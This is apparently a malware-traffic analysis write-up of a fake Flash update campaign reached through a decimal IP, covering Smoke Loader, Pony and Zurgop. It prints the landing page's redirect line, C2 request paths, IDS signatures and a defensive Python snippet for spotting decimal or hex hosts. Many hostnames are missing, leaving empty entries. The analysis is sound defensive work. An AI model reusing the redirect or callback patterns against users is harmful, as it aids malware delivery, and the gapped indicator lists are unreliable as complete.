Decimal IP Campaign

For background on the Decimal IP Campaign, please read this article written on March 29th, 2017, by Jérôme Segura over at Malwarebytes Lab:

I got the decimal IP used for this infection from ‘s blog post found HERE.


  • – IP decimal redirector
  • – Fake Flash Player update landing page
  • – – Connectivity check
  • –
  • –
  • –
  • – – POST /po/asdfkuj.php
    • ET TROJAN Fareit/Pony Downloader Checkin 2
  • – – GET /asdoiu398j/gate.php?client_id=aed68d54&connected=0&server_port=0&debug=0
  • –
    • ET INFO Suspicious Windows NT version 9 User-Agent
    • ET TROJAN Generic gate[.].php GET with minimal headers
  • –
  • –

Traffic Filtered in Wireshark:

Traffic 1

Traffic 2

My User-Agent for this infection was IE 11 and I didn’t use a compromised website. Instead, I went directly to the decimal IP at 1755118211, which then redirected my host to The response from that GET request resulted in a redirect to a fake Flash Player update landing page at

302 Found -
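A "decimal IP" such as 1755118211 is just the 32-bit IPv4 address written as a single integer, which browsers still accept in a URL. The following is an added example, not code from the original post: it converts between the two notations and flags proxy-log requests whose host is a bare decimal or 0x-prefixed hex number rather than a hostname or dotted quad. The log lines are constructed samples; only the 1755118211 value comes from the write-up.

```python
import re
from urllib.parse import urlsplit

# Constructed proxy log lines (not from the original post). The decimal host
# 1755118211 is the redirector value named in the write-up; the rest is made up.
SAMPLE_LOG = """\
2017-04-01T10:00:01Z 10.0.0.5 GET http://1755118211/ 302
2017-04-01T10:00:02Z 10.0.0.5 GET http://example.invalid/flash/index.html 200
2017-04-01T10:00:09Z 10.0.0.5 GET http://0x689CFA83/ 302
2017-04-01T10:00:15Z 10.0.0.5 POST http://203.0.113.10/po/asdfkuj.php 200
"""

def decimal_to_dotted(value: int) -> str:
    """Turn a 32-bit 'decimal IP' into dotted-quad notation."""
    if not 0 <= value <= 0xFFFFFFFF:
        raise ValueError("not a 32-bit IPv4 value")
    return ".".join(str((value >> shift) & 0xFF) for shift in (24, 16, 8, 0))

def dotted_to_decimal(addr: str) -> int:
    """Inverse of decimal_to_dotted: dotted quad -> single integer."""
    octets = [int(o) for o in addr.split(".")]
    if len(octets) != 4 or any(not 0 <= o <= 255 for o in octets):
        raise ValueError("not a dotted quad")
    return (octets[0] << 24) | (octets[1] << 16) | (octets[2] << 8) | octets[3]

# Hosts browsers accept that are neither DNS names nor dotted quads:
# a bare integer (decimal form) or a 0x-prefixed hex value.
_ODD_HOST = re.compile(r"^(?:\d+|0x[0-9a-f]+)$", re.IGNORECASE)

def normalize_host(host: str):
    """Return the dotted quad for a decimal/hex host, None for anything else."""
    if not _ODD_HOST.match(host):
        return None
    value = int(host, 16) if host.lower().startswith("0x") else int(host)
    return decimal_to_dotted(value)

def find_obfuscated_hosts(log_text: str):
    """Return (line, dotted_ip) for requests whose URL host is an integer form.

    Assumes the constructed format: timestamp client method url status."""
    hits = []
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) < 4:
            continue
        dotted = normalize_host(urlsplit(parts[3]).hostname or "")
        if dotted is not None:
            hits.append((line, dotted))
    return hits
```

The normalized dotted form is what you would match against a blocklist or pivot on, since the same address can appear as a decimal, hex, or dotted host.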

The fake Flash Player update page at was mirrored from, which no longer resolves. Here is an image of the fake Flash Player page:

Decimal IP fake flash player landing page

The source code of the page contains the following location.href:

setTimeout("location.href = 'hxxp://';", 1000);

This prompts the user to open or save flashplayer24pp_id_install.exe. The executable is being identified as Smoke Loader:

The last time I got Smoke Loader it downloaded Neutrino Bot:

Persistence found during this infection:

Persistence 1

After letting the infected system sit idle for about 10 minutes we see additional malware (CC81.tmp.dll) dropped in %Temp%:


Scanning CC81.tmp.dll on VirusTotal and Hybrid-Analysis showed that it was Pony:

This is followed by Pony callback traffic via POST requests to Other URLs found in the binary/memory include:

Pattern match: “hxxp://” (resolves to
Pattern match: “hxxp://” (resolves to
Pattern match: “hxxp://” (resolves to
Pattern match: “hxxp://” (resolves to

Later we see an executable called tdcbwl.exe dropped in %AppData%:


Scanning the file on VirusTotal and Hybrid-Analysis shows it could be Zurgop downloader:

This is followed by GET requests to the following URLs:

Connects to via TCP port 1079

My infected host is making connections to via TCP port 1079 every 5 minutes:

Traffic 3

TCP port scan on

25/tcp   open  smtp
1067/tcp open  instl_boots
1075/tcp open  rdrmshc
1079/tcp open  asprovatalk

Artifacts from this infection:

You can download the malware from the Hybrid-Analysis reports.

Until next time!
